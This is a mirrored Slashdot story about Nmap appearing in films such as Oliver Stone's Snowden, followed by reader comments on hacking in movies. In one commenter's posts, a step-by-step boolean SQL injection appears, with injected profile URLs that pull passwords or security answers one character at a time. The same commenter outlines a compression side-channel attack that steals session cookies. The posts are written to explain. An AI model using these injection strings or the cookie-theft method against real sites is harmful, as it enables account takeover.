Slashdot Mirror
More Code In Movies: Nmap Meets Snowden (nmap.org)
After Saturday's story about the code samples in the new movie Arrival, an anonymous reader reminded us of this classic essay at Nmap.org:
For reasons unknown, Hollywood has decided that Nmap is the tool to show whenever hacking scenes are needed... While Nmap had been used in some previous obscure movies, it was The Matrix Reloaded which really turned Nmap into a movie star!
Nmap.org has a tradition -- the first person to notify them when new Nmap appears in a new movie wins a signed copy of Nmap Network Scanning "or a T-shirt of your choice from the Zero Day Clothing Nmap Store." (The site adds that "movie script writers, artists, and digital asset managers are also welcome to email Fyodor for advice.") And Nmap.org just added another film, Oliver Stone's new movie about Edward Snowden. In one early scene, Snowden is given a network security challenge at a CIA training class which is expected to take 5 to 8 hours. But with the help Nmap and a custom Nmap NSE script named ptest.nse, Snowden stuns the professor by completing everything in 38 minutes!
According to the site, even the movie's trailer features Nmap. Anybody else have their own favorite stories about code in the movies?
Nmap.org has a tradition -- the first person to notify them when new Nmap appears in a new movie wins a signed copy of Nmap Network Scanning "or a T-shirt of your choice from the Zero Day Clothing Nmap Store." (The site adds that "movie script writers, artists, and digital asset managers are also welcome to email Fyodor for advice.") And Nmap.org just added another film, Oliver Stone's new movie about Edward Snowden. In one early scene, Snowden is given a network security challenge at a CIA training class which is expected to take 5 to 8 hours. But with the help Nmap and a custom Nmap NSE script named ptest.nse, Snowden stuns the professor by completing everything in 38 minutes!
According to the site, even the movie's trailer features Nmap. Anybody else have their own favorite stories about code in the movies?
but can nmap hack the gibson?
There was a space travel themed ride at (I think) Great America in Gurnee Illinois, and the line passed through what was supposed to be the mission control room. One one of the screens, they displayed scrolling C code, which appeared to be some sort of industrial/motor control software. I had a pleasant time in line doing a code review.
Someone could require to release the movies under the GPL
is the ridiculous portrayal of "hacking" and tech in general, along with the blatent disregard for law and constitution that often goes along with it. it's just cheap lazy ass film making.
*** 3d mazes and dragons and fire and shit? nope. not hardly.
*** "enhance!" (+ rinse and repeat)to blow up a single pixel of a reflection in a car's side mirror captured by a fuzzy analog security cam into a glorious full hd image.. nope. that's even worse
*** three clicks and 10 seconds to search all sorts of databases (government or private, with or without the fucked up 'hacking' graphics and such) the characters shouldn't have access to, certainly not always 'at the ready'... and probably not even with court orders.. nope. cross reference them and others and spit out the perfect suspect or target list. that's up there on the creepy and bad list too.
it's really nice to see some movie production teams put some effort into at least somewhat realistic (albeit boring as fuck) scenes and sequences.
>running nmap
>what is this computer shit
>ahh, it must be
>
>code!!1
"code"? who needs code when you already Know the Code.
The other reason for choosing LISP is that aliens would have a better chance of understanding it. Being based on the Lambda Calculus. it represents a fundamental understanding of the theory of computation. It is likely that other intelligent species would recognize it. It's unclear that C or C++ show that any intelligent life exists on earth.
Why is Snark Required?
Not raw code as such, but I like it whenever entertainment makes Visual Basic references...
https://www.youtube.com/watch?v=hkDD03yeLnU
In the movie Blackhat there's a screen where a hex editor is used to analyze some malware code. The hex code is just random nonsense, but the ASCII conversion contains lines from an erotic novel, but with each word reversed
Here's a screenshot:
http://imgur.com/VIWNahL
The text on the right says
Her lover one day takes O for a walk ....
in a section of the city where they never go the Montsouris Park. After they have taken a stroll in the park, and have sat together side by side on the edge of a lawn, they notice at one corner of the park, at an intersection where there are never any taxis, a car which, because
--
which comes from this:
https://archive.org/stream/The... ... O_djvu.txt
---- El diablo esta en mis pantalones! Mire, mire!
> ** Cracking a password one character at a time until all the characters are filled in. Nope, passwords are an all or nothing proposition.
Many attacks against passwords/keys are character-at-a-time. All types of padding oracle attacks are character-at-a-time, as are sql injection with results determined by the presence or absence of an error. (where password like 'a%'). Padding oracle attacks include POODLE and Lucky Thirteen.
> *** Hacking/coding as a real-time activity (e.g. furiously typing code to block another hacker in real-time)
I've done that, when I became aware of a breach due to what the attacker was doing at the moment, and I had only remote access so I couldn't pull the network cable.
Here's a specific example of hacking a password one character at a time, with details of how it's done.
Like most message boards, you can see my profile by going to:
slashdot.org/~raymorris
With many scripts, the profile url ends with ?userid=123
If you're a programmer, you know that's likely to be implemented with a line of code like this:
SELECT * FROM users WHERE userid='$input'
That ends up running:
SELECT * FROM users WHERE userid='raymorris'
Note that you get an error message if the username doesn't exist.
To hack someone's password, we use this URL:
slashdot.org/~raymorris'+ AND+password+LIKE+'a%
Which runs this SQL:
SELECT * FROM users WHERE userid='raymorris' AND password LIKE 'a%'
As always, if that matches a user it will show their profile. If no user is found by the SQL, the page shows an error.
We try each character until we don't get an error. Suppose "J" shows the profile. We know the first character of the password is J. So we load up:
slashdot.org/~raymorris'+ AND+password+LIKE+'Ja%
Voila, cracking passwords one character at a time. Works on many systems that havev databases on the backend.
Suppose the coder is knowledgeable enough that they used salted hashes of the passwords. No problem, we just use:
slashdot.org/~raymorris'+ AND+forgot-pwd-answer+LIKE+'a%
If the site has a "forgot your password?" feature where you answer a question like "what was your first pet's name?", the name of the pet is effectively an alternate password, and it's unlikely to be hashed.
That scene was entertaining.
I think I was unclear. I'm NOT talking about brute force. I'm taking about finding the first character, then several seconds later cracking the second character, then several more seconds to get the third character, etc. Here's a step by step for one easy example, a boolean return SQLi:
https://slashdot.org/comments....
Padding oracle attacks are the same - you find the first character, then you find the second character, etc. Here's a rough description of one other similar example:
As is/was common for https traffic, traffic compressed with gzip and encrypted. This string compresses well:
Cookie:abcabcabc
This one compresses poorly:
Cookie:abfkdgrkdgs
Assume the cookie is an access cookie for your bank. Seeing the encrypted traffic, I can't read it, but I can see how big it is. Using Javascript, I put an img tag on our web page for each of these URLs:
bank.com/Cookie:a
bank.com/Cookie:b
bank.com/Cookie:c
Your browser creates, compresses, and encrypts the following requests:
Get /Cookie:a
Cookie:bfjshdhd
Get /Cookie:b
Cookie:bfjshdhd
Get /Cookie:c
Cookie:bfjshdhd
Since they are encrypted I, as an attacker can't read the requests to get your session cookie. However I can see how big the request is, after compression. You'll notice the second request contains the repeated string "Cookie:b". Since it's an exact repeat, it will compress better than the others, and I as an attacker nkw know the first character of your authentication cookie. My Javascript then repeats with:
Get /Cookie:ba
Cookie:bfjshdhd
Get /Cookie:bb
Cookie:bfjshdhd
Get /Cookie:bc ...
Cookie:bfjshdhd
Voila, I get your authentication cookie (effectively a password) one character at a time.
Yes, I do hack banks and other "secure" sites for a living.
Try reading the post before criticizing it and you might not make a complete fool out yourself again. Try reading the last three sentences or so starting with "if the password is hashed".
I liked tron the best. Solar OS (Solaris?) running on sun4u hardware hey?
There were also a lot of parallels in the movie between the new ENRON owners and the new owners of Sun Microsystems (Oracle). Jumping Jack Flash was interesting too. Of course there are lots of others like Cloak and Dagger, War Games etc..
mame was in godzilla 2000
Its software.
We already have the Wilhelm scream that has appeared in countless movies as a kind of insider joke/cameo (including all Star Wars movies to date), so why not have the "Fyodor Code" as well?
UNIX? They're not even circumcised! Savages!
Someone cared.
In Visual Basic.
I knew I needed to stop reading Slashdot and finish my PhD when I started to miss articles by Bennett Haselton.
Ok, how's this for a scif{i,antasy} storyline- Snowden in 2012 or so stumbles upon secret CIA research into an atomic/photonic sized wormhole generation technique that can hack computers from the future or the past. Snowden discovers that Trump will beat Hillary in '16. Then funny stuff commences.
Seriously, can we redo all those Snowden debates from 2013 in the context of Trump being the next president, and after all the things said and done during the campaign? Do you really want to let them narrate away LOVINT now Snowden? Do we really want to lose the amount of sleep that will be lost knowing that Trump will have all the abilities that Snowden had in addition to the ability to start WW3?
Holy Shit people, grab onto your pussies, it's going to be a wild ride.
Not that I've seen, or even will bother to see the context of this, but this sounds a bit like what I would call 'sysadmin ingenuity'. I.e. sysadmins that are familiar with the unixy tools and recombining them for all sorts of improvised tasks can come up with speedy solutions like this that more traditional 'programmers' would miss. And in fact, this is basically why the premise of the summary seems bunk to me. nmap and ssh are the swiss army knives of getting anything serious done with computers involving security. And gpg and all the other obvious ones. For all the secrets Snowden revealed, we basically learned that the feds have no better advice than 'sftp' which we all knew already.
Showing a program operate almost certainly does not make that movie a derivative work...
The attack I just described gets the cookie, it doesn't require CSRF, and will get the cookie for most any site.
Note the URLs used are all 404, they don't exist. CSRF would be causing the browser to load a legitimate and important URL like change-password.php?newpass=hacked
I hope this movie has drawing on windows.
Can't stand to see a movie with a science/maths/programming bent that doesn't have drawing on windows.
What was Nmap payed for its stellar performance in thise movies? (The GPL seems to have overlooked movie appearance)